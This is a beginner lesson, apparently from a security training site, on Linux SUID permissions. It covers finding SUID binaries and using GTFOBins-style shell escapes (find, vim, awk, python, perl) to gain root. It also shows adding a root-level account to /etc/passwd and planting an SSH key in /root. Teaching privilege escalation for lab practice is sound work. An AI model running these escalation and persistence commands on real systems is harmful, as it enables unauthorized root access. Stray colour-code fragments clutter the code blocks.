SUID Fundamentals

beginner25 minWriteup

Understanding and finding SUID binaries

Learning Objectives

  • Understand SUID/SGID
  • Find SUID binaries
  • Identify exploitable SUID
  • Use GTFOBins

SUID (Set User ID) is a special permission that makes executables run as their owner rather than the user executing them. When a SUID binary is owned by root, ANY user runs it as root. This legitimate feature becomes a security issue when misused.

Think of SUID like a special badge that says "treat me as the owner." The "passwd" command needs SUID to modify /etc/shadow (owned by root) on behalf of regular users. But give SUID to vim? Now anyone can edit any file as root.

Legitimate vs Dangerous

SUID exists for good reasons (passwd, ping, mount). The danger is when SUID is set on binaries that can execute commands, read files, or spawn shells - those become instant root access.

Understanding SUID

bash
1606070;"># Permission bits review
2-rwxr-xr-x  = Regular executable (755)
3-rwsr-xr-x  = SUID set (4755) ← Note the 606070;">#a5d6ff;">'s'
4-rwxr-sr-x  = SGID set (2755)
5-rwsr-sr-x  = Both SUID and SGID (6755)
6 
7606070;"># The 's' replaces 'x' in owner permissions
8606070;"># Capital 'S' means SUID is set but not executable (broken)
9 
10606070;"># How SUID works:
111. Regular execution: /usr/bin/cat runs as YOU
122. SUID execution: /usr/bin/passwd runs as ROOT (owner)
13 
14606070;"># Check SUID status
15ls -l /usr/bin/passwd
16606070;"># -rwsr-xr-x 1 root root ... /usr/bin/passwd
17606070;">#    ^-- 's' means SUID, owned by root = runs as root

Real vs Effective UID

bash
1606070;"># When you run a SUID binary:
2Real UID (RUID)      = Your actual user (e.g., 1001)
3Effective UID (EUID) = The owner of SUID binary (e.g., 0 for root)
4 
5606070;"># The EUID is what matters for permission checks
6606070;"># The binary runs with EUID permissions
7 
8606070;"># You can see this difference:
9id                   606070;"># Shows your real identity
10606070;"># In a SUID context, effective permissions differ

Finding SUID Binaries

bash
1606070;"># Find all SUID binaries
2find / -perm -4000 -type f 2>/dev/null
3 
4606070;"># Find SUID owned by root specifically
5find / -perm -4000 -user root -type f 2>/dev/null
6 
7606070;"># Also find SGID binaries
8find / -perm -2000 -type f 2>/dev/null
9 
10606070;"># Find both SUID and SGID
11find / -perm /6000 -type f 2>/dev/null
12 
13606070;"># More detailed output
14find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
15 
16606070;"># Save to file for analysis
17find / -perm -4000 -type f 2>/dev/null > suid_binaries.txt

Common Legitimate SUID

1Normal SUID binaries (expected):
2├── /usr/bin/passwd      - Change passwords
3├── /usr/bin/sudo        - Run as other users
4├── /usr/bin/su          - Switch user
5├── /usr/bin/mount       - Mount filesystems
6├── /usr/bin/umount      - Unmount filesystems
7├── /usr/bin/ping        - Network diagnostics
8├── /usr/bin/chsh        - Change shell
9├── /usr/bin/chfn        - Change finger info
10├── /usr/bin/newgrp      - Change group
11└── /usr/bin/gpasswd     - Manage groups
12 
13These are normal and usually not exploitable.
14Look for UNUSUAL binaries or those on GTFOBins.

GTFOBins Reference

GTFOBins (gtfobins.github.io) is your bible for SUID exploitation. It lists Unix binaries that can be exploited for privilege escalation when they have SUID or sudo permissions.

bash
1606070;"># Common exploitable SUID binaries from GTFOBins:
2 
3606070;"># find - Execute commands
4find . -exec /bin/sh -p \;
5 
6606070;"># vim/vi - Spawn shell
7vim -c 606070;">#a5d6ff;">':!/bin/sh'
8 
9606070;"># less/more - Spawn shell
10less /etc/passwd
11606070;"># Then type: !/bin/sh
12 
13606070;"># nmap (old versions) - Interactive mode
14nmap --interactive
15606070;"># Then: !sh
16 
17606070;"># awk - Execute commands
18awk 606070;">#a5d6ff;">'BEGIN {system("/bin/sh")}'
19 
20606070;"># python - Spawn shell
21python -c 606070;">#a5d6ff;">'import os; os.system("/bin/sh")'
22 
23606070;"># perl - Spawn shell
24perl -e 606070;">#a5d6ff;">'exec "/bin/sh";'
25 
26606070;"># bash - Preserved privileges
27bash -p
28 
29606070;"># cp - Overwrite files
30606070;"># Can copy /etc/passwd with modified root entry

Always Check GTFOBins

When you find a SUID binary, immediately check GTFOBins. Even seemingly harmless binaries might have exploitation methods you wouldn't think of.

Basic SUID Exploitation

Shell Escape from Editors

bash
1606070;"># vim/vi with SUID
2/usr/local/bin/vim  606070;"># Assuming this has SUID
3:!/bin/sh           606070;"># Spawn shell from vim
4606070;"># Or:
5:set shell=/bin/sh
6:shell
7 
8606070;"># less/more with SUID
9/usr/local/bin/less /etc/passwd
10!/bin/sh            606070;"># Press ! then type command
11 
12606070;"># nano with SUID
13606070;"># Ctrl+R to read file, Ctrl+X to execute
14606070;"># Can read sensitive files at minimum

Command Execution

bash
1606070;"># find with SUID
2./find . -exec /bin/sh -p \;
3606070;"># -p preserves effective UID
4 
5606070;"># awk with SUID
6./awk 606070;">#a5d6ff;">'BEGIN {system("/bin/sh -p")}'
7 
8606070;"># python with SUID
9./python -c 606070;">#a5d6ff;">'import os; os.setuid(0); os.system("/bin/sh")'
10 
11606070;"># perl with SUID
12./perl -e 606070;">#a5d6ff;">'exec "/bin/sh -p";'
13 
14606070;"># env with SUID
15./env /bin/sh -p
16 
17606070;"># time with SUID
18./time /bin/sh -p

File Read/Write

bash
1606070;"># cp with SUID - Overwrite /etc/passwd
2606070;"># Create a new passwd entry with known password
3openssl passwd -1 -salt xyz password123
4606070;"># $1$xyz$pF...hash...
5 
6606070;"># Append to passwd (if cp doesn't work, try other methods)
7echo 606070;">#a5d6ff;">'hacker:$1$xyz$pF...hash...:0:0:root:/root:/bin/bash' >> /etc/passwd
8 
9606070;"># Now login as hacker with password "password123" = root
10 
11606070;"># Alternative: Copy SSH key to root
12mkdir -p /root/.ssh
13cp ~/.ssh/id_rsa.pub /root/.ssh/authorized_keys

Use -p Flag

Many shells drop privileges when spawned. The -p flag (bash -p) preserves effective UID. Without it, you might get a shell that's back to your normal user!

Identifying Custom SUID

bash
1606070;"># Look for unusual SUID binaries:
2606070;"># 1. Not in /usr/bin or /bin
3606070;"># 2. Have unusual names
4606070;"># 3. Recently created
5 
6606070;"># Find SUID not in standard paths
7find / -perm -4000 -type f 2>/dev/null | grep -v 606070;">#a5d6ff;">"/usr\|/bin"
8 
9606070;"># Check for custom scripts with SUID
10find / -perm -4000 -name 606070;">#a5d6ff;">"*.sh" 2>/dev/null
11 
12606070;"># Recent SUID files
13find / -perm -4000 -mtime -7 2>/dev/null  606070;"># Modified in last 7 days
14 
15606070;"># Check what a binary does
16file /path/to/suid/binary
17strings /path/to/suid/binary | head -50
18ltrace /path/to/suid/binary 2>&1 | head -50
19strace /path/to/suid/binary 2>&1 | head -50

SUID Enumeration Methodology

SUID Attack Flow

1
Findfind / -perm -4000 -type f 2>/dev/null
2
ListRemove known safe binaries from list
3
ResearchCheck each unknown binary on GTFOBins
4
AnalyzeFor custom binaries, use file/strings/strace
5
ExploitUse appropriate technique for the binary
6
VerifyConfirm root access with id command

Knowledge Check

Quick Quiz
Question 1 of 3

What does the 's' in -rwsr-xr-x indicate?

Challenges

Find the SUID

Challenge
🌱 beginner

On a practice machine, find all SUID binaries and identify at least one that can be exploited using GTFOBins.

Need a hint? (4 available)

Key Takeaways

  • SUID makes binaries run as their owner (often root)
  • Find SUID with: find / -perm -4000 2>/dev/null
  • Always check GTFOBins for exploitation methods
  • Use -p flag to preserve privileges in spawned shells
  • Custom SUID binaries are often misconfigured
  • Shell escapes (vim, less) provide root shells from SUID editors